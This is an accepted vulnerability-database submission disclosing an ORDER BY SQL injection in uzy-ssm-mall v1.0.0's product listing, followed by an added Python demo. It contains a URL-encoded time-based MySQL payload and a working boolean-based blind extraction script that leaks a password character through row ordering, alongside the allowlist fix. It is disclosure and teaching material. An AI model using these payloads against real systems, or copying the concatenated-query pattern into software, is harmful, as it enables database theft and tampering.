Submission #549260: ghostxbh uzy-ssm-mall v1.0.0 SQL Injection (Info)

Title: ghostxbh uzy-ssm-mall v1.0.0 SQL Injection
Description:

Vulnerability Description
In uzy-ssm-mall v1.0.0, the /mall/product/0/20 interface contains a high-risk SQL injection vulnerability. The root cause is that the code does not filter or validate data received from the frontend and concatenates it directly into an SQL statement. An attacker who supplies a crafted value can therefore alter the database query, which may lead to the retrieval, modification, or deletion of sensitive data in the database.

Vulnerability Location
The vulnerability is reachable through the /mall/product/0/20 interface. The affected code path runs from the controller down to the database layer: ForeProductListController --> ProductServiceImpl --> ProductMapper.

Code Audit Process
Vulnerability File Path / File Name: The injection point is the ORDER BY clause; the sort field used there is taken from the frontend request.

Vulnerability Call Sequence:
ProductMapper: the Mapper layer, responsible for interacting with the database.
ProductServiceImpl: the business-logic layer, which calls the Mapper layer for database operations.
ForeProductListController: the controller layer, which receives frontend requests and calls the Service layer for processing.

Vulnerability Code Analysis: In ForeProductListController.java, the sort field is passed straight through from the frontend without any filtering or validation. That field is concatenated directly into the SQL statement, which results in an SQL injection vulnerability. Note that an ORDER BY column name cannot be supplied as a bound parameter (a bound value is treated as a constant, not as a column reference), which is typically why such code resorts to string concatenation; the correct fix is to map the request value onto an allowlist of column names.

Vulnerability Exploitation: By constructing malicious input, an attacker controls the ORDER BY expression and can thereby cause arbitrary SQL subqueries to be evaluated.

POC
http(s)://target-ip/mall/product/0/20?category_id=151&isDesc=true&orderBy=%28select%2Afrom%28select%2Bsleep%280%29union%2F%2A%2A%2Fselect%2B1%29a%29

The URL-encoded orderBy value decodes to (select*from(select sleep(0)union/**/select 1)a), a MySQL subquery placed into the ORDER BY clause. With sleep(0) it only confirms that the injected subquery is executed; raising the sleep argument turns it into a time-based probe.
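The following is an added example (not code from uzy-ssm-mall or from the submitter) that reproduces the ORDER BY injection described above and shows the allowlist fix. It uses an in-memory SQLite database with a constructed schema; the table and column names (product, product_sale_price, user, user_password) are assumptions for the demo and are not the project's own. SQLite stands in for MySQL, so the payload is a boolean-based one (a CASE expression that flips the sort order) rather than the sleep()-based probe in the POC; the row order returned by the listing becomes the oracle for extracting data one character at a time.

```python
import sqlite3

# Allowlist mapping request values to real column names. Column names here are
# an assumption of this demo, not uzy-ssm-mall's schema.
ALLOWED_ORDER_COLUMNS = {
    "product_id": "product_id",
    "product_name": "product_name",
    "product_sale_price": "product_sale_price",
}


def setup_db():
    """Create an in-memory SQLite database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (product_id INTEGER PRIMARY KEY,
                              product_name TEXT, product_sale_price REAL);
        INSERT INTO product VALUES (1, 'phone', 10.0), (2, 'cable', 5.0), (3, 'case', 7.5);
        CREATE TABLE user (user_id INTEGER PRIMARY KEY, user_password TEXT);
        INSERT INTO user VALUES (1, 's3cret');
    """)
    return conn


def list_products_vulnerable(conn, order_by, is_desc):
    """Mirrors the flaw: the sort field is spliced into the SQL text
    (the MyBatis ${orderBy} pattern), so any expression is evaluated."""
    direction = "DESC" if is_desc else "ASC"
    sql = "SELECT product_id FROM product ORDER BY " + order_by + " " + direction
    return [row[0] for row in conn.execute(sql)]


def list_products_bound(conn, order_by, is_desc):
    """The tempting non-fix: binding the field as a parameter (MyBatis #{}).
    The bound value is a string constant, so there is no injection, but no
    sorting by that column either, which is why developers fall back to ${}."""
    direction = "DESC" if is_desc else "ASC"
    sql = "SELECT product_id FROM product ORDER BY ? " + direction
    return [row[0] for row in conn.execute(sql, (order_by,))]


def list_products_fixed(conn, order_by, is_desc):
    """Hardened form: resolve the request value through the allowlist and
    build ORDER BY only from the mapped column; anything else is rejected."""
    column = ALLOWED_ORDER_COLUMNS.get(order_by)
    if column is None:
        raise ValueError(f"unsupported orderBy value: {order_by!r}")
    direction = "DESC" if is_desc else "ASC"
    sql = f"SELECT product_id FROM product ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def blind_payload(guess):
    """Boolean-based ORDER BY payload: sort by product_id when the guess for the
    first password character is right, by -product_id when it is wrong."""
    return ("(CASE WHEN (SELECT substr(user_password, 1, 1) FROM user "
            "WHERE user_id = 1) = '" + guess + "' THEN product_id "
            "ELSE -product_id END)")


def leak_first_password_char(conn, charset="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Drive the oracle through the vulnerable listing: the guess whose payload
    yields the ascending order [1, 2, 3] is the first password character."""
    ascending = list_products_fixed(conn, "product_id", False)
    for ch in charset:
        if list_products_vulnerable(conn, blind_payload(ch), False) == ascending:
            return ch
    return None


if __name__ == "__main__":
    db = setup_db()
    print(list_products_fixed(db, "product_sale_price", True))      # [1, 3, 2]
    print(list_products_vulnerable(db, blind_payload("s"), False))  # [1, 2, 3]
    print(list_products_vulnerable(db, blind_payload("x"), False))  # [3, 2, 1]
    print(leak_first_password_char(db))                             # s
```

The same loop extended over every character position recovers the whole value, and in MySQL the CASE expression can be swapped for the sleep()-based subquery from the POC to obtain a timing oracle instead. Only the allowlisted function refuses the payload; the parameter-bound variant is safe but silently ignores the requested sort column.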
Source: https://wiki.shikangsi.com/post/share/ba8925f0-0480-4356-9b32-4543d0ea8671
User: XingYue_Mstir (UID 72225)
Submitted: 2025-04-02 11:56 AM (1 year ago)
Moderation: 2025-04-14 12:36 AM (12 days later)
Status: Accepted
VulDB Entry: 304600 [ghostxbh uzy-ssm-mall 1.0.0 /mall/product/0/20 ForeProductListController orderBy SQL Injection]
Points: 20
